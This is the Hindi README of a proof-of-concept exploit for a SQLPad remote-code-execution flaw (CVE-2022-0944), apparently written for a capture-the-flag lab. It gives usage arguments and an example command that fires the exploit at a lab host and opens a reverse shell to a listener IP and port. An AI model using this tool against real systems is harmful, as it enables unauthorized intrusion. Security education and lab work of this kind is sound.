
SQLPad RCE (CVE-2022-0944) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो हमलावर की मशीन पर रिवर्स शेल ट्रिगर करता है, यह अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए है।
SQLPad RCE (CVE-2022-0944) के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट, जो हमलावर के पीसी तक एक reverse shell के साथ RCE की ओर ले जाता है।
usage: script.py URL IP PORT
positional arguments:
URL SQLPad का URL
IP reverse shell के लिए सुनने वाले होस्ट का पता
PORT reverse shell के लिए सुनने वाला पोर्ट
उदाहरण:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
इस रिपॉजिटरी में ऐसे उपकरण शामिल हैं जो केवल शैक्षिक उद्देश्यों के लिए हैं, विशेष रूप से साइबर सुरक्षा सीखने के वातावरण में उपयोग के लिए। इस कोड के लेखक इस कोड के उपयोग, दुरुपयोग या संशोधन से उत्पन्न होने वाले किसी भी परिणाम की जिम्मेदारी नहीं लेते हैं। कोड "जैसा है" प्रदान किया गया है, बिना किसी स्पष्ट या निहित वारंटी के, जिसमें व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटी शामिल है, लेकिन यहीं तक सीमित नहीं है।